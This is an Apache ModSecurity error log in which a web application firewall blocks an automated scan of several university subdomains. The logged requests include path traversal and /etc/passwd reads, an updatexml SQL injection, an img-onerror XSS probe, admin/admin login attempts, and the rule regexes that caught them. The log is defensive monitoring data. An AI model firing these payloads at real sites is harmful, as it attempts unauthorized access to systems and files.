[Tue Aug 29 11:42:59.697702 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAdxUTkAAAAC"]
[Tue Aug 29 11:42:59.708033 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAd64SoAAAAp"]
[Tue Aug 29 11:42:59.708227 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAc@cawAAAAL"]
[Tue Aug 29 11:43:00.400640 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAdftVAAAAAG"]
[Tue Aug 29 11:43:00.403313 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAdECccAAAAW"]
[Tue Aug 29 11:43:00.404988 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAQSW30AAAA0"]
[Tue Aug 29 11:43:00.405070 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13VMCo-f0AAAbo-foAAAAi"]
[Tue Aug 29 11:43:00.405256 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAc361AAAAAO"]
[Tue Aug 29 11:43:00.416854 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAdxUToAAAAC"]
[Tue Aug 29 11:43:00.419385 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAcsLH0AAAAE"]
[Tue Aug 29 11:43:00.421360 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAeChZQAAAAw"]
[Tue Aug 29 11:43:00.422864 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAc@ca4AAAAL"]
[Tue Aug 29 11:43:00.424611 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAdECcgAAAAW"]
[Tue Aug 29 11:43:00.426471 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAdQ3jIAAAAV"]
[Tue Aug 29 11:43:00.432739 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAARpg3wAAAAU"]
[Tue Aug 29 11:43:00.439264 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22username\\x22:\\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAdxUTsAAAAC"]
[Tue Aug 29 11:43:00.480068 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAeX1DMAAAAK"]
[Tue Aug 29 11:43:00.481864 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22username\\x22:\\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAdxUTwAAAAC"]
[Tue Aug 29 11:43:00.491126 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:,.*?[)\\\\da-f\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98][\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98](?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98].*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|\\\\Z|[^\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]+))|(?:\\\\Wselect.+\\\\W*?from)|((? ..." at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "209"] [id "981257"] [msg "Detects MySQL comment-/space-obfuscated injections and backtick termination"] [data "Matched Data: ,\\x22password\\x22: found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAdECcoAAAAW"]
[Tue Aug 29 11:43:01.413607 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22username\\x22:\\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VcCo-f0AAAeX1DUAAAAK"]
[Tue Aug 29 11:43:01.424778 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VcCo-f0AAAdSZPAAAAAX"]
[Tue Aug 29 11:43:01.430434 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VcCo-f0AAAeZ56IAAAAN"]
[Tue Aug 29 11:43:02.432247 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAc361YAAAAO"]
[Tue Aug 29 11:43:02.437585 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAeoBAcAAAAT"]
[Tue Aug 29 11:43:02.442435 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAdftVUAAAAG"]
[Tue Aug 29 11:43:02.453184 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAdTBDQAAAAY"]
[Tue Aug 29 11:43:03.412745 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAcoNmQAAAAF"]
[Tue Aug 29 11:43:03.415576 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAdQ3jgAAAAV"]
[Tue Aug 29 11:43:03.434213 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAXNuYkAAAAg"]
[Tue Aug 29 11:43:03.439607 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAcoNmUAAAAF"]
[Tue Aug 29 11:43:03.439937 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAcsLIUAAAAE"]
[Tue Aug 29 11:43:03.467080 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAeZ56cAAAAN"]
